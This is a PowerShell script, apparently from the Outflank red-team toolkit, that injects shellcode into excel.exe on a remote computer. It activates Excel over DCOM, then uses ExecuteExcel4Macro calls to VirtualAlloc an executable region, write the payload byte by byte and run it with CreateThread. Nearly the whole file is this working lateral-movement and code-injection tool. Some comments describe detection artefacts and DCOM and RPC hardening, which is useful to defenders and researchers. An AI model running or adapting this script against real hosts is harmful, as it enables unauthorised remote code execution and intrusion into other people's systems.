#********************************************************************** | |
# Invoke-Excel4DCOM64.ps1 | |
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support | |
# Author: Stan Hegt (@StanHacked) / Outflank, | |
# x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason, | |
# Excel version detection by Joe Leon (@JoeLeonJr) / FortyNorth Security | |
# Date: 2019/04/21 | |
# Version: 1.1 | |
#********************************************************************** | |
function Invoke-Excel4DCOM | |
{ | |
<# | |
.SYNOPSIS | |
Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM. | |
.DESCRIPTION | |
Use Excel 4.0 / XLM macros on a DCOM instance of excel.exe to do shellcode injection. | |
Use a Powershell version with the same bitness as the Office version when running locally. | |
This script automatically parses the Excel version (x86 vs x64) and sends the appropriate shellcode. | |
.PARAMETER Computername | |
Specify a remote host to inject into. | |
.PARAMETER Payload86 | |
Specify a file containing the x86 shellcode. | |
.PARAMETER Payload64 | |
Specify a file containing the x64 shellcode. | |
.EXAMPLE | |
PS > Invoke-Excel4DCOM -ComputerName server01 -Payload C:\temp\payload.bin | |
Inject payload into excel.exe on server01. | |
.LINK | |
http://www.outflank.nl | |
.NOTES | |
Outflank - stan@outflank.nl | |
Observable behaviour, in the order the code below produces it: excel.exe on the
target is activated through DCOM rather than opened by a user; that process commits
a read/write/execute region with VirtualAlloc; it receives one ExecuteExcel4Macro
call per payload byte; a thread is then started at the allocated address.
Restricting remote launch/activation rights on the Excel.Application DCOM object and
filtering inbound RPC/DCOM between workstations removes the remote entry point.
#> | |
[CmdletBinding()] Param( | |
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)] | |
[Alias("PSComputerName","MachineName","IP","IPAddress","Host")] | |
[String] | |
$ComputerName, | |
[Parameter(Position = 1, Mandatory = $true)] | |
[Alias("Shellcode86","x86", "86")] | |
[String] | |
$Payload86, | |
[Parameter(Position = 2, Mandatory = $true)] | |
[Alias("Shellcode64", "x64", "64")] | |
[String] | |
$Payload64 | |
) | |
# Create an instance of the Excel.Application COM object | |
# The second argument to GetTypeFromProgID names the machine on which the object is
# activated, so Excel is started on $ComputerName and driven from here over DCOM.
# NOTE(review): on the target this typically shows up as excel.exe started by the DCOM
# launcher service with automation/embedding arguments - confirm against local process telemetry.
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) | |
# Bitness is inferred from the install path reported by the remote instance: a path
# containing "x86" selects the 32-bit payload, any other path selects the 64-bit one.
if ($excel.path -like "*x86*") { | |
$lpAddress = 0 | |
$sc = get-content -Encoding Byte $Payload86 | |
} | |
else { | |
# If we are using 64bit Excel, try to allocate a low address | |
# 1342177280 = 0x50000000, passed below as VirtualAlloc's preferred base address.
$lpAddress = 1342177280 | |
$sc = get-content -Encoding Byte $Payload64 | |
} | |
# Address allocation | |
# VirtualAlloc(lpAddress, payload length, 12288, 64):
#   12288 = 0x3000 = MEM_COMMIT | MEM_RESERVE, 64 = 0x40 = PAGE_EXECUTE_READWRITE.
# A private RWX region inside excel.exe is the artefact memory scanners key on.
$memaddr = $excel.ExecuteExcel4Macro('CALL("Kernel32","VirtualAlloc","JJJJJ",'+$lpAddress+',' + $sc.length + ',12288,64)') | |
# $count is the byte offset into the allocated buffer.
$count = 0 | |
# Write the payload byte by byte to our allocated buffer | |
# Each iteration is a separate ExecuteExcel4Macro round trip to the remote instance
# (memset of one byte at $memaddr + $count), so payload size maps directly to DCOM
# call volume against the target. $ret is assigned but never inspected.
foreach ($byte in $sc) { | |
$ret = $excel.ExecuteExcel4Macro('CALL("ntdll","memset","JJJJ", ' + ($memaddr + $count) + ',' + $byte + ', 1)') | |
$count = $count + 1 | |
Write-Progress -Id 1 -Activity "Invoke-Excel4DCOM64" -CurrentOperation "Injecting shellcode" -PercentComplete ($count / $sc.length * 100) | |
} | |
# Shellcode Time! | |
# CreateThread with lpStartAddress = $memaddr: execution begins inside the buffer,
# i.e. a thread in excel.exe whose start address is not backed by a loaded image.
$excel.ExecuteExcel4Macro('CALL("Kernel32","CreateThread","JJJJJJJ",0, 0, ' + $memaddr + ', 0, 0, 0)') | |
} |